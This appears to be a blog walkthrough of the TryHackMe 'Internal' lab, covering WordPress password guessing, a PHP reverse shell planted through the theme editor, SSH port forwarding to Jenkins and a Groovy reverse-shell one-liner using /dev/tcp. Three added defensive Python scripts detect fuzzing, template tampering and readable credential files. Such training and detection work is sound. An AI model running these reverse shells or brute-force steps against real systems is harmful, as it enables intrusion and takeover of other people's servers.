Hello everyone! Today we’ll be covering a Penetration Testing Challenge called “Internal” on TryHackme. Hope You Enjoy It!
Before starting, make sure to add "<room ip> internal.thm" to /etc/hosts.
1. Recon (Information Gathering):
nmap -p- -T4 -A internal.thm
We can determine from the output that SSH and HTTP are running on their default ports, 22 and 80, respectively.
Browsing the page reveals a default Apache welcome page:
After examining the page source, I found nothing, so I moved on to directory brute forcing with ffuf.
ffuf -w /usr/share/wordlists/dirb/common.txt:FUZZ -u http://internal.thm/FUZZ
After examining the website, I found a login page:
http://internal.thm/blog/wp-login.php
Trying the default credentials admin:password did not work, but the error message indicated that the "admin" user exists.
2. Exploitation:
After intercepting the login request with Burp Suite and replaying it through Intruder, I found the admin password to be my2boys.
Another way of doing it is with the wpscan tool:
wpscan --url http://internal.thm/wordpress -U admin -P ~/Desktop/WordLists/Passwords/rockyou.txt
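Both the ffuf enumeration and the password guessing above (Intruder or wpscan) leave a distinctive trace in the web server's access log: one client producing a burst of 404s, and one client POSTing to wp-login.php over and over with a 200 response (WordPress re-renders the form on a failed login and answers 302 on success). The following detector is an added example, not part of the original write-up; the log lines, the client addresses and the thresholds (20 404s or 10 failed logins within 60 seconds) are constructed for the example and should be tuned to the site's normal traffic.

```python
"""Flag directory fuzzing and wp-login.php password guessing in an Apache
combined access log. Sample log lines are constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format; the timestamp uses %d/%b/%Y:%H:%M:%S %z.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        'ip': m['ip'],
        'ts': datetime.strptime(m['time'], '%d/%b/%Y:%H:%M:%S %z'),
        'method': m['method'],
        'path': m['path'].split('?', 1)[0],   # drop the query string
        'status': int(m['status']),
    }


def find_bursts(events, window_s, threshold):
    """events: iterable of (ip, timestamp). Sliding window per client; returns
    {ip: largest number of events seen in any window_s-second window} for every
    client that reached the threshold."""
    by_ip = defaultdict(list)
    for ip, ts in events:
        by_ip[ip].append(ts)
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        left, best = 0, 0
        for right, t in enumerate(times):
            while (t - times[left]).total_seconds() > window_s:
                left += 1
            best = max(best, right - left + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def analyse(lines, window_s=60, fuzz_threshold=20, login_threshold=10):
    fuzz_events, login_events = [], []
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        if ev['status'] == 404:
            fuzz_events.append((ev['ip'], ev['ts']))
        # A POST to wp-login.php answered with 200 is a failed login attempt.
        if ev['method'] == 'POST' and ev['path'].endswith('/wp-login.php') and ev['status'] == 200:
            login_events.append((ev['ip'], ev['ts']))
    return {
        'fuzzing': find_bursts(fuzz_events, window_s, fuzz_threshold),
        'login_guessing': find_bursts(login_events, window_s, login_threshold),
    }


def constructed_sample_log():
    """Constructed sample: a normal visitor, then one client fuzzing paths and
    guessing passwords. Addresses and timestamps are made up."""
    lines = [
        '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 10918',
        '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /blog/ HTTP/1.1" 200 5123',
        '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0',
    ]
    for i in range(30):   # 30 guessed directory names in 30 seconds
        lines.append(f'10.9.1.7 - - [01/Jan/2024:10:05:{i:02d} +0000] "GET /dir{i} HTTP/1.1" 404 275')
    for i in range(15):   # 15 failed logins in 15 seconds
        lines.append(f'10.9.1.7 - - [01/Jan/2024:10:10:{i:02d} +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4120')
    return lines


if __name__ == '__main__':
    for kind, hits in analyse(constructed_sample_log()).items():
        for ip, count in hits.items():
            print(f'{kind}: {ip} ({count} events in one window)')
```

Feed it real lines with `analyse(open('/var/log/apache2/access.log').read().splitlines())`; the successful login from the normal visitor (status 302) is deliberately not counted, so a flagged client is one that kept failing.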
Now we can login to the dashboard using those credentials. From here, we need to find a way to get a reverse shell.
You can go to: WordPress >> Appearance >> Theme Editor >> 404 Template
Replace the existing code with a PHP reverse shell. You can find one here:
After making the necessary modifications and saving the file, make sure you have a listener running:
nc -lvnp <port>
Now visit:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
Et voilà! You now have a reverse shell. To stabilise it:
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
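The foothold above works because the dashboard lets an administrator rewrite theme templates on disk (WordPress disables that editor when wp-config.php defines DISALLOW_FILE_EDIT as true). Even with the editor enabled, the edit is easy to catch on the file system: a template's hash changes, and the new content calls functions a theme has no business calling. The integrity check below is an added example, not part of the original write-up or of WordPress itself; the toy theme, its files and the planted 404.php content are constructed in a temporary directory.

```python
"""Baseline-and-compare integrity check for a WordPress theme directory,
followed by a scan of any new or changed PHP file for functions that open
sockets or processes. The toy theme is constructed for this example."""
import hashlib
import os
import re
import tempfile

# Functions a theme template should never call; a hit in a changed file is a finding.
SUSPICIOUS_PHP = re.compile(
    r'\b(fsockopen|proc_open|popen|shell_exec|passthru|system|exec|eval|base64_decode)\s*\('
)


def snapshot(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, 'rb') as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Paths that appeared, disappeared, or changed content between two snapshots."""
    both = set(baseline) & set(current)
    return {
        'added': sorted(set(current) - set(baseline)),
        'removed': sorted(set(baseline) - set(current)),
        'modified': sorted(p for p in both if baseline[p] != current[p]),
    }


def suspicious_calls(path):
    """Distinct suspicious function names called in a PHP file."""
    with open(path, 'r', encoding='utf-8', errors='replace') as fh:
        return sorted(set(SUSPICIOUS_PHP.findall(fh.read())))


def audit(root, baseline):
    """Compare root against a trusted baseline and scan new/changed PHP files."""
    changes = diff_snapshots(baseline, snapshot(root))
    findings = {}
    for rel in changes['added'] + changes['modified']:
        if rel.endswith('.php'):
            hits = suspicious_calls(os.path.join(root, rel))
            if hits:
                findings[rel] = hits
    changes['suspicious'] = findings
    return changes


def demo():
    """Construct a toy theme, take the baseline, replace 404.php the way the
    Theme Editor would, and return the audit result."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            'style.css': '/* Theme Name: toy */\n',
            'index.php': '<?php get_header(); ?>\n',
            '404.php': '<?php get_header(); ?>\n<h1>Not found</h1>\n',
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), 'w', encoding='utf-8') as fh:
                fh.write(body)
        baseline = snapshot(root)
        # Constructed stand-in for the edited template: it opens a socket and a process.
        with open(os.path.join(root, '404.php'), 'w', encoding='utf-8') as fh:
            fh.write("<?php\n$s = fsockopen($host, $port);\n$p = proc_open('/bin/sh', $spec, $pipes);\n")
        return audit(root, baseline)


if __name__ == '__main__':
    result = demo()
    print('modified:', result['modified'])
    print('suspicious:', result['suspicious'])
```

In practice the baseline is taken from a clean copy of the theme (or the archive downloaded from wordpress.org) and stored outside the web root, and the audit runs from cron; the hash comparison catches any edit, while the function scan ranks which changed file to look at first.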
After spending two hours here and running linpeas.sh with no luck, I came across a "wp-save.txt" file in /opt.
It contained aubreanna's SSH credentials. Time to log in over SSH.
And there it is: we got the user.txt flag.
3. Privilege Escalation:
Tried running "sudo -l", but no luck: aubreanna cannot run anything as root.
Tried running "find / -perm -u=s -type f 2>/dev/null", but nothing interesting came out.
cat jenkins.txt
It appears that a Docker container is running on the target machine with a 172.x IP address, and that Jenkins is hosted inside it on port 8080. To reach it, we use SSH local port forwarding to map the Jenkins IP and port on the target machine to a port on our attacking machine.
ssh -L 5555:172.17.0.2:8080 aubreanna@internal.thm
Now visit "localhost:5555".
Tried the default credentials "admin:password" with no luck. Then tried brute forcing the login page with Burp Intruder using the wordlist "/usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt".
We got the following credentials: "admin:spongebob".
We reached the dashboard.
After a while of searching and googling how to execute code, I came across the script console at the following URL:
Run the following Groovy code and make sure you have a listener running:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
We got a shell. Now let's make it stable:
/bin/bash -i
We got a shell as jenkins. Going into the /opt directory, I found a note.txt file containing root's SSH credentials.
From here, you can log in as root and get the root flag.
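Both pivots in this box (wp-save.txt giving aubreanna's SSH password, note.txt giving root's) come from the same weakness: a credential left in a plaintext file that a less privileged account can read. A periodic audit of that kind of file is cheap to run. The script below is an added example, not part of the original write-up; it walks a directory tree, considers only regular files readable by "other", and reports credential-looking lines with the value redacted. The sample files, their contents and their permission bits are constructed in a temporary directory; the keyword list is an assumption and should be extended for the environment.

```python
"""Audit a directory tree for world-readable files containing credential-like
lines. Findings carry the path, mode and line number; the secret itself is
redacted. Sample files are constructed for this example."""
import os
import re
import stat
import tempfile

# Keywords that usually precede a secret, followed by ':' or '='. Extend as needed.
CRED_RE = re.compile(r'(?i)\b(password|passwd|pass|pwd|secret|token)\b\s*[:=]\s*(\S+)')
MAX_BYTES = 1_000_000   # skip large files; they are rarely hand-written notes


def world_readable(mode):
    return bool(mode & stat.S_IROTH)


def scan_file(path):
    """Return (line number, keyword, redacted value) for each matching line."""
    hits = []
    try:
        with open(path, 'r', encoding='utf-8', errors='ignore') as fh:
            for lineno, line in enumerate(fh, 1):
                m = CRED_RE.search(line)
                if m:
                    hits.append((lineno, m.group(1).lower(), '*' * min(len(m.group(2)), 8)))
    except OSError:
        pass   # unreadable or vanished between listing and opening
    return hits


def audit_tree(root, only_world_readable=True):
    """Findings for regular files under root, sorted by path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)   # lstat: do not follow symlinks out of the tree
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or st.st_size > MAX_BYTES:
                continue
            if only_world_readable and not world_readable(st.st_mode):
                continue
            hits = scan_file(full)
            if hits:
                findings.append({
                    'path': os.path.relpath(full, root),
                    'mode': oct(stat.S_IMODE(st.st_mode)),
                    'hits': hits,
                })
    return sorted(findings, key=lambda f: f['path'])


def demo():
    """Construct a small /opt-like tree and audit it. Contents are made up."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            'wp-save.txt': ('user=alice\npassword=constructed-example\n', 0o644),
            'note.txt': ('service account: admin\npassword: constructed-root-example\n', 0o644),
            'private.txt': ('password: constructed-private\n', 0o600),   # owner-only, not reported
            'README': ('Nothing to see here.\n', 0o644),
        }
        for name, (body, mode) in samples.items():
            path = os.path.join(root, name)
            with open(path, 'w', encoding='utf-8') as fh:
                fh.write(body)
            os.chmod(path, mode)
        return audit_tree(root)


if __name__ == '__main__':
    for f in demo():
        for lineno, keyword, redacted in f['hits']:
            print(f"{f['path']} (mode {f['mode']}) line {lineno}: {keyword}={redacted}")
```

Run it as `audit_tree('/opt')` from a privileged cron job; anything it reports should either be moved into a secrets store or, at minimum, chmod'ed so that only the owning service account can read it.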
Hope you enjoyed it!
Happy Hacking!